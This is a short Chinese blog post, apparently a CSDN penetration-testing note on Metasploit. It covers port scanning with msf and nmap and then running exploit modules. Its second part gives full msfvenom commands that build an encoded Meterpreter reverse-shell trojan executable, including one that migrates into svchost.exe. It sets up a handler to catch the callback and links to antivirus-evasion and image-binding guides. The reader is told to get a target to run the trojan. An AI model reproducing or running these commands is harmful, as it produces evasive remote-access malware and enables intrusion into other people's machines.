LINUX(四)渗透测试metasploit

攻击方式 利用漏洞 利用后门
一 利用漏洞
1 扫描端口
(一)使用msf扫描
(1)查看可用端口

search portscan

(2)使用扫描模块

use *****

(3)查看配置选项,配置扫描模块

show options
set LPOST ***

(4)运行扫描模块

run

(二)使用nmap 扫描

nmap -O -Pn/-p0 IP
nmap -sV IP

2 搜索漏洞

search 服务名(version)

3 使用漏洞模块

use ***

4 配置漏洞模块

show options
set HOST IP

5 发起进攻

exploit

二 利用木马
1 生成木马(固定写法)

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 lhost=192.168.1.5 lport=6666 -f exe > hack.exe

捆绑svchost.exe应用程序

msfvenom -p windows/meterpreter/reverse_tcp  --platform LHOST=192.168.1.4 LPORT=5555 -e x86/shikata_ga_nai -i 12 -b '\x00\' PrependMigrate=true PrependMIgrateProx=svchost.exe  -f exe > /root/Desktop/shellcode.exe
-p 选择payload
-e 选择编码器
-i 编码次数
-f 编译后的格式
-x 捆绑程序
-a 系统位数 x64 x86 x86_64

想办法让靶机执行木马
2 服务器启动接受木马请求
打开数据库服务

 service postgresql start

启动metasploit

msfconsole

选择攻击模块

use exploit/multi/handler

设置payload

set payload windows/meterpreter/reverse_tcp

查看设置选项,配置HOST PORT

show options

启动服务

run

免杀
https://blog.csdn.net/weixin_40602516/article/details/81144189
https://blog.csdn.net/zsc201825/article/details/80918185
https://blog.csdn.net/weixin_39997829/article/details/80001681

图片捆绑
https://blog.csdn.net/xiaoi123/article/details/78915374

自己自启
https://www.cnblogs.com/findumars/p/6435434.html

使用mingw32 自研
apt-get install mingw-w64

修改FakeImageExploiter.sh文件,替换成i686-w64-mingw32-gcc

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值